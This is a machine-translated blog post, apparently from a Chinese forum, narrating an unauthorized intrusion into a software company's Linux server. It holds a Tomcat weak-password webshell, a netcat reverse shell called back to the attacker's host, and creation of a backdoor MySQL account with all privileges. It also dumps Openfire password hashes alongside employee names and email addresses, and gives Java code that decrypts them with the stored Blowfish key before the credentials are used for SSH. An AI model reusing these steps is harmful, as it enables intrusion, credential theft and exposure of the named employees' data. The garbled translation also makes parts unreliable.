Temporary social workers perform openfire decryption during Linux Server penetration

Source: Internet
Author: User

The starting point is the weak password of the Tomcat/manager/html administrator page.
By the way, you can use google hack to search for tomcat pages.
Enter intitle: Apache. Tomcat "Congratulations in the browser! "
It indicates that the title Keyword is separated by a dot and the page content is matched by a colon.

Of course, if the/manager/html page is deleted, or the Administrator does not configure the account password to be available, the management interface will not be accessible.
Upload Deploy a JSP Trojan:

Essential process for Linux privilege escalation -- rebound with webshell command execution:
Compile the netcat source file:

  1. Gcc xiaobo. c-o xiaobo
Local listening:
  1. Nc-vv-lp 12345
Copy codeRebound in JSP Trojan:
  1. ./Xiaobo xx. xx 12345
Copy codeNote: Sometimes the execution bounce will fail because the file is not set to executable. Set it to full permission directly:
  1. Chmod 777 xiaobo
Copy code

First, we need to collect the system information:
  1. Lsb_release-

That is to say, we need to find Ubuntu 12.04 or exploit with the kernel 3.2.0-38.
Usually go to exploit-db.com this website to find.
Unfortunately, you cannot find a few exploit instances.
Of course, we can also seek for a driver or a third-party service to raise the right. I have never succeeded.
Continue to collect server information. Use superscan to scan open ports:

Using metasploit, I tried FTP and SSH exploit and weak passwords. Fruitless
I tried the High-field ports in the browser and found that there was also a tomcat (no weak password) and a sea-file team collaborative management platform.
After google sea-file, it was found that it was an open-source "distributed file synchronization technology" developed by Chinese people.
I carefully studied the installation and configuration of the tool and used sqlite to embed the database. Weibo asked the development team about the location of the file where the tool saves the user account and password: ccnet/peerMgr/usermgr. db. The result is that the folder ccnet has no access permission, but I still find a seahub. db that stores the account name. I opened it and looked at it:

The following account, weak password, and social engineering account are successfully logged on:

We can see that the company is developing, or has completed the contract, project plan, design book, and so on. We can know that this server is from a software company. These things should be confidential --:

First, check whether there are any vulnerabilities to upload or not. Development language:C/C ++ Python --. The server also comes with something you don't know. So give up. Permission is used to collect information.
You can see the company's member list and administrator:

Continue social engineering:
Find the project under tomcat and find the saved mysql password. You have successfully logged on to mysql using the root password and webshell. (Of course, this is an episode where my webshell cannot connect to mysql, or the show databases, show tables, and other operations are not supported, so I changed the source code again)
Database Connection Failed
Com. mysql. jdbc. exceptions. jdbc4.MySQLNonTransientConnectionException: Cannot load connection class because of underlying exception: 'java. lang. numberFormatException: For input string: "3306; User = root; Password = testxx; DatabaseName = mysql "'.

To facilitate data viewing, you can directly enable external links. Here, let's take a look:
To protect the server, I will not use the root external link. Avoid being scanned for weak passwords in batches.
Create a user hack and password hack that allow remote connection, and grant all Permissions
  1. Create user hack identified by 'hink ';
  2. Grant all privileges on *. * to hack @ "%" identified by "hack ";
Copy codeThen, use mysql workbench to connect (dedicated for developers ~ Hey hey)
Episode: It is said that mysql in linux can use the system command to escalate permissions. I remotely connect to mysql on the windows Command Line and try the system user add command. Go to the mysql official website and check the official documentation. The system function. BT5 command line is used to remotely connect to mysql. The system user is added successfully, and the user added to my bt5. Should all of you know what mysql system functions mean?

Back to question: I want to collect all the user accounts and passwords for mysql DATA inventory, and further use the linux root Password for remote ftp or ssh operations.
Some md5 codes are decrypted, basically weak passwords.
Highlights: openfire database.
When I looked at the name, I thought it was a bit too much. Google then got it: Openfire is a real-time WEB-based instant messaging platform, and it was the original Jive Messenger.
Admin De8d41e122591e3ac5dfabf41bb8ee186cb0ec963%ae71 Administrator Admin@family10.com
Caifei 0db546455b7e6a8bd1905e34028ca31704ae5cf27a65e1c2 Cai Fei Caifei@qq.com
Chensong E54b7b46c4862dd1ea159a174eb1e26d6b6c1fac89a5dc73 Chen Song Chensong@qq.com
Liqiang 4f21a0de9b6a32aadd0a6bd0cf53a82da4244bc85111556e Li Qiang Liqiang4264@qq.com
Liqing 0d24c065be1fdd4db3dde16d39b8907fda-8a8a4a7f84c75 Li Qing Liqing@qq.com
Liuhuayi 5809dadd4631e859d995d93ff0587524f75c541ab55f23c6 Liu Huayi Liuhuayi@qq.com
Qiulibo 8c14fda295def40ba10bcd9b78ee869ce5a9880eaa8c6eb6 Qiu Libo Qiubibo@qq.com
Xuliang Ba8dc396077d18e3a5683455a92d808adb06d8ac74f31fa3 Xu Liang Xuliang@qq.com
Zhangxin B88349048d4b55b91f9a942652b89cf36d75cc2e8ba2cfd6 Zhang Xin Zhangxin@qq.com

The data is decrypted on step 5, and the encryption type cannot be identified. Therefore, the focus of this article is openfire decryption.
Openfire is also an open-source software, and the password uses its own algorithm.
Openfire provides secondary development. Google later found that there were quite a lot of materials. Therefore, we will build a secondary development environment and use the decryption class provided by openfire for decryption ~
  1. Openfire is implemented through org. jivesoftware. util. Blowfish. java.
  2. Use the encryptString (String password) and decryptString (String encryptedString) Methods of Blowfish to perform encryption and decryption.
  3. New Blowfish (String passwordKey) requires passwordKey. Where can I find it?
  4. Originally, there was a table ofproperty in the openfire database, with the passwordKey value, which was automatically generated when openfire was installed.
  5. Each time openfire automatically generates a database, this attribute is different. Therefore, if the database changes, it is useless to import the original user information.
  6. You can use org. jivesoftware. util. Blowfish. java to perform encryption and decryption independently.
Copy codeCreate a java project in eclipse, find the org. jivesoftware. util. Blowfish. java class on the official website, and import the project.
Write a new DecryPwd for decryption.
  1. Public class DecryPwd {
  3. /**
  4. * @ Param args
  5. */
  6. Public static void main (String [] args ){
  7. // TODO Auto-generated method stub
  8. String resultPWD = null;
  9. String passWordKey = "566251afC9Lk39w"; // passwordKey, read from openfire Database
  10. Blowfish blowFish = new Blowfish (passWordKey); // initialize Based on the encryption key
  11. ResultPWD = blowFish. decryptString ("de8d41e122591e3ac5dfabf41bb8ee186cb0ec963%ae71 ");
  12. System. out. println (resultPWD); // return the result
  13. }
  15. }
Operation successful decryption!
Then I took the account and password to ssh. This is the process.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.